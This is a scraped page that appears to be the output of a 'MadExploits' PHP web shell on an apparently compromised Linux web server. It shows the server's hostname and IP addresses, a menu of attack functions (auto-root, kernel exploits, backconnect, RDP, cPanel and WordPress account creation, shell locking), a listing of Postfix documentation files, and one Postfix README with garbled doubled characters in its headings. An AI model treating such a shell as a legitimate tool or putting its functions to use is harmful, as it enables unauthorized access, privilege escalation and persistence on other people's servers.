Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.186
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
postfix /
README_FILES /
[ HOME SHELL ]
Name
Size
Permission
Action
AAAREADME
2.99
KB
-rw-r--r--
ADDRESS_CLASS_README
9.33
KB
-rw-r--r--
ADDRESS_REWRITING_README
42.72
KB
-rw-r--r--
ADDRESS_VERIFICATION_README
23.28
KB
-rw-r--r--
BACKSCATTER_README
12.5
KB
-rw-r--r--
BASIC_CONFIGURATION_README
21.06
KB
-rw-r--r--
BUILTIN_FILTER_README
16.36
KB
-rw-r--r--
COMPATIBILITY_README
12.05
KB
-rw-r--r--
CONNECTION_CACHE_README
9.23
KB
-rw-r--r--
CONTENT_INSPECTION_README
3.29
KB
-rw-r--r--
DATABASE_README
17.04
KB
-rw-r--r--
DB_README
7.58
KB
-rw-r--r--
DEBUG_README
18.09
KB
-rw-r--r--
DSN_README
4.33
KB
-rw-r--r--
ETRN_README
11.4
KB
-rw-r--r--
FILTER_README
28.61
KB
-rw-r--r--
FORWARD_SECRECY_README
28.84
KB
-rw-r--r--
INSTALL
63.8
KB
-rw-r--r--
IPV6_README
11.79
KB
-rw-r--r--
LINUX_README
2.32
KB
-rw-r--r--
LOCAL_RECIPIENT_README
5.65
KB
-rw-r--r--
MAILDROP_README
5.23
KB
-rw-r--r--
MEMCACHE_README
2.27
KB
-rw-r--r--
MILTER_README
41.04
KB
-rw-r--r--
MULTI_INSTANCE_README
42.58
KB
-rw-r--r--
NFS_README
4.73
KB
-rw-r--r--
OVERVIEW
20.31
KB
-rw-r--r--
PACKAGE_README
5.79
KB
-rw-r--r--
POSTSCREEN_README
39.46
KB
-rw-r--r--
QSHAPE_README
36.63
KB
-rw-r--r--
RELEASE_NOTES
6.13
KB
-rw-r--r--
RESTRICTION_CLASS_README
7
KB
-rw-r--r--
SASL_README
64.71
KB
-rw-r--r--
SCHEDULER_README
65.39
KB
-rw-r--r--
SMTPD_ACCESS_README
20.66
KB
-rw-r--r--
SMTPD_POLICY_README
27.23
KB
-rw-r--r--
SMTPD_PROXY_README
11.9
KB
-rw-r--r--
SOHO_README
13
KB
-rw-r--r--
STANDARD_CONFIGURATION_README
26.56
KB
-rw-r--r--
STRESS_README
20.67
KB
-rw-r--r--
TLS_LEGACY_README
51.47
KB
-rw-r--r--
TLS_README
125.7
KB
-rw-r--r--
TUNING_README
24.3
KB
-rw-r--r--
ULTRIX_README
1.96
KB
-rw-r--r--
UUCP_README
5.14
KB
-rw-r--r--
VERP_README
7.35
KB
-rw-r--r--
VIRTUAL_README
23.52
KB
-rw-r--r--
XCLIENT_README
10.03
KB
-rw-r--r--
XFORWARD_README
8.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTENT_INSPECTION_README
PPoossttffiixx CCoonntteenntt IInnssppeeccttiioonn ------------------------------------------------------------------------------- Postfix supports three content inspection methods, ranging from light-weight one-line-at-a-time scanning before mail is queued, to heavy duty machinery that does sophisticated content analysis after mail is queued. Each approach serves a different purpose. bbeeffoorree qquueeuuee,, bbuuiilltt--iinn,, lliigghhtt--wweeiigghhtt This method inspects mail BEFORE it is stored in the queue, and uses Postfix's built-in message header and message body inspection. Although the main purpose is to stop a specific flood of mail from worms or viruses, it is also useful to block a flood of bounced junk email and email notifications from virus detection systems. The built-in regular expressions are not meant to implement general SPAM and virus detection. For that, you should use one of the content inspection methods described below. Details are described in the BUILTIN_FILTER_README and BACKSCATTER_README documents. aafftteerr qquueeuuee,, eexxtteerrnnaall,, hheeaavvyy--wweeiigghhtt This method inspects mail AFTER it is stored in the queue, and uses standard protocols such as SMTP or "pipe to command and wait for exit status". After-queue inspection allows you to use content filters of arbitrary complexity without causing timeouts while receiving mail, and without running out of memory resources under a peak load. Details of this approach are in the FILTER_README document. bbeeffoorree qquueeuuee,, eexxtteerrnnaall,, mmeeddiiuumm--wweeiigghhtt The following two methods inspect mail BEFORE it is stored in the queue. * The first method uses the SMTP protocol, and is described in the SMTPD_PROXY_README document. This approach is available with Postfix version 2.1 and later. * The second method uses the Sendmail 8 Milter protocol, and is described in the MILTER_README document. This approach is available with Postfix version 2.3 and later. Although these approaches appear to be attractive, they have some serious limitations that you need to be aware of. First, content inspection software must finish in a limited amount of time; if content inspection needs too much time then incoming mail deliveries will time out. Second, content inspection software must run in a limited amount of memory; if content inspection needs too much memory then software will crash under a peak load. Before-queue inspection limits the peak load that your system can handle, and limits the sophistication of the content filter that you can use. The more sophisticated content filtering software is not built into Postfix for good reasons: writing an MTA requires different skills than writing a SPAM or virus killer. Postfix encourages the use of external filters and standard protocols because this allows you to choose the best MTA and the best content inspection software for your purpose. Information about external content inspection software can be found on the Postfix website at http:// www.postfix.org/, and on the postfix-users@postfix.org mailing list.
Close